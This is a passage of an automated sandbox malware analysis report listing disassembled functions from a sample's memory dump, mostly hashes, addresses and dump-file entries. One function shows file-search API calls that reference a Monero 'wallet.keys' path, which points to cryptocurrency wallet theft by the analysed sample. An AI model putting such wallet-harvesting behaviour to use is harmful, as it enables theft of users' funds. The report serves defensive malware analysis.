                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -E~?$A'
                            • API String ID: 0-2307484516
                            • Opcode ID: 8c3e0dd9ea8025e293f1dbcdef4a8713bd2606f95c0f749456bd28804277dbf0
                            • Instruction ID: eaab0481af8c283651b477dd1082a65533f99b42ac8844b2ae2815a7b7bf5923
                            • Opcode Fuzzy Hash: 8c3e0dd9ea8025e293f1dbcdef4a8713bd2606f95c0f749456bd28804277dbf0
                            • Instruction Fuzzy Hash: DEB208F3A082109FE304AE2DEC8567AFBE9EF94760F16463DEAC4C7744E63558058693
                            Function 00881836 Relevance: 3.9, Strings: 3, Instructions: 185COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /59,$zsOv$~sOv
                            • API String ID: 0-475423279
                            • Opcode ID: be8c0795defedfe2b25c7b99f69d28471793b3a8740162e262d7c732f97d122b
                            • Instruction ID: 7e721f01b54c3930c6b6b7e7bf50280e06a4ce76ed1129392f69aeadba0a7d48
                            • Opcode Fuzzy Hash: be8c0795defedfe2b25c7b99f69d28471793b3a8740162e262d7c732f97d122b
                            • Instruction Fuzzy Hash: 045118F3A082146BE3189E59ECC1B7AF3D9EB98320F1B463DEAC993740E5756C014695
                            Function 009B560C Relevance: 3.3, Strings: 2, Instructions: 781COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <$3:$?X{
                            • API String ID: 0-485475520
                            • Opcode ID: 86f24074e727e7e6907ad84ae29efb3b149e187e735c22621a7a077c9f45b6e2
                            • Instruction ID: bff291e0711e0bf89244239c9b3f6836deb8fd25ef6438d548debc98ef86b16f
                            • Opcode Fuzzy Hash: 86f24074e727e7e6907ad84ae29efb3b149e187e735c22621a7a077c9f45b6e2
                            • Instruction Fuzzy Hash: 423208F350C2049FE3146E2DDC8576AFBE9EF94320F1A493DEAC483744EA3558158697
                            Function 009B81B6 Relevance: 2.8, Strings: 1, Instructions: 1599COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: `[m
                            • API String ID: 0-3565385072
                            • Opcode ID: 2ef3cc49e287d3c9ae7e3931ce48db5185e4f036141dda3afef09982ce4a8a53
                            • Instruction ID: 5ea1b82654d9513db000b772a127c4d575f4e66ec6b9d4fa0668fcb73d5fe57c
                            • Opcode Fuzzy Hash: 2ef3cc49e287d3c9ae7e3931ce48db5185e4f036141dda3afef09982ce4a8a53
                            • Instruction Fuzzy Hash: 02B229F3A0C2049FE3046E2DEC9567ABBE9EF94720F1A463DEAC4C7344E63558058697
                            Function 00986AE2 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ]^u}$jas[
                            • API String ID: 0-4247793429
                            • Opcode ID: 8bdc4630ac85e85e42ccbca6b88b76b4ba5ce6f6098f5d2eb33e28dffffb5033
                            • Instruction ID: 24bef497a4ac07f5be41dc1bc78f86df02df257de2cab9296edf4079f868e577
                            • Opcode Fuzzy Hash: 8bdc4630ac85e85e42ccbca6b88b76b4ba5ce6f6098f5d2eb33e28dffffb5033
                            • Instruction Fuzzy Hash: 1D4138F3E0C2105FE3186E69DC9576BB7DAEBD4310F2B463DDAC443784E97958018686
                            Function 009C95C6 Relevance: 2.4, Strings: 1, Instructions: 1126COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #.M
                            • API String ID: 0-306105806
                            • Opcode ID: fa79e3b021822dc67a7198fcb4b5e03a8bfeca4692dc3b3e63daa9392d3ddad7
                            • Instruction ID: 692f7db6b7a722e4ac8daf92042b39c395af1e428bf6896c9e8fea7a943237cf
                            • Opcode Fuzzy Hash: fa79e3b021822dc67a7198fcb4b5e03a8bfeca4692dc3b3e63daa9392d3ddad7
                            • Instruction Fuzzy Hash: 6B7208F3A082009FE3146E29EC8577AF7E9EF94720F1A452DEAC4D3740EA3598418797
                            Function 005FF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006115B8,00610D96), ref: 005FF71E
                            • StrCmpCA.SHLWAPI(?,006115BC), ref: 005FF76F
                            • StrCmpCA.SHLWAPI(?,006115C0), ref: 005FF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FFAB1
                            • FindClose.KERNEL32(000000FF), ref: 005FFAC3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: adf30c47ff3ebf04835abf7dafefdba5c4605a42419896da0460f2aba94d7136
                            • Instruction ID: 16d1dbd3aa493d42b6522d4f321f3568e836cccaa53aa54383d0ea8fa3931ca8
                            • Opcode Fuzzy Hash: adf30c47ff3ebf04835abf7dafefdba5c4605a42419896da0460f2aba94d7136
                            • Instruction Fuzzy Hash: 8811B73084020D9BDB58FBE0DC55EEE773AAF10340F4086ADA51A564D2EF302B4ACB56
                            Function 008A2F8A Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *YZz
                            • API String ID: 0-2099423365
                            • Opcode ID: 3dc38c93f7a3d786df789f86c4e122ec6459c008bf0bdb6c9f460982b13e82c2
                            • Instruction ID: 37fa79d3f09e84444cea8b28eb2ba59763bbb7acf6d82f6c7146524c1f1963b3
                            • Opcode Fuzzy Hash: 3dc38c93f7a3d786df789f86c4e122ec6459c008bf0bdb6c9f460982b13e82c2
                            • Instruction Fuzzy Hash: E46117F3A193005FF304992AEC8476BB7DAEFD8720F2AC53DE78883644E5388C058656
                            Function 008F1F0B Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: N'y9
                            • API String ID: 0-3329616576
                            • Opcode ID: 02cf6eaba779cab3f1d108a7ad1e451ab87d39ee43d1f3d15d1c5a64f6cba75d
                            • Instruction ID: 07dfea15286fbb57f61a99cd77175db4195408becfc3e6f5ced9536bf1d7d6e8
                            • Opcode Fuzzy Hash: 02cf6eaba779cab3f1d108a7ad1e451ab87d39ee43d1f3d15d1c5a64f6cba75d
                            • Instruction Fuzzy Hash: 055158F3E181109BF744682DED6477A76CACBD4330F3A863DEA95D7784E83A88054296
                            Function 0088662B Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: aB;
                            • API String ID: 0-4029130727
                            • Opcode ID: 44dee97118ea43ba73b69b017846ca541c9c00e905531635e68f9f396de97a13
                            • Instruction ID: 7b742195705a6d2fb55ce6939c728ee3b0d646cdf9a6163bac0672879f1652f0
                            • Opcode Fuzzy Hash: 44dee97118ea43ba73b69b017846ca541c9c00e905531635e68f9f396de97a13
                            • Instruction Fuzzy Hash: 6B516BF3E182105BE318692DEC49766BBDADBD4330F2A423EEA84D7784E8754C058196
                            Function 008AFAEB Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: mjh
                            • API String ID: 0-1552672764
                            • Opcode ID: 040ab4386c446f0367b29595092bf5dc656f11a51fa4063d497c3b4ddf22f7f6
                            • Instruction ID: 2408aab6d43b040642fa1cc5e8671062455bd4c5ce03d49afcc5fa9126647c39
                            • Opcode Fuzzy Hash: 040ab4386c446f0367b29595092bf5dc656f11a51fa4063d497c3b4ddf22f7f6
                            • Instruction Fuzzy Hash: FF5188F3B192289BE7045D2DDCD4776B7D9EB98221F2B423DDF88A7784E8361C058291
                            Function 00897C2C Relevance: .2, Instructions: 228COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e3353a0fcce207860cc241cb880046b6ca4c293bd1f50de320bf3091525f23a
                            • Instruction ID: 0252b85350711f0bc50a07fe3b46d835b1c098ee3fec0bf47c436870e106a9cd
                            • Opcode Fuzzy Hash: 3e3353a0fcce207860cc241cb880046b6ca4c293bd1f50de320bf3091525f23a
                            • Instruction Fuzzy Hash: 6971E2F390C7049FE304AE69DCC176AB7D9EFA4324F1A863DE7D583380E97958008686
                            Function 00990F9E Relevance: .2, Instructions: 219COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
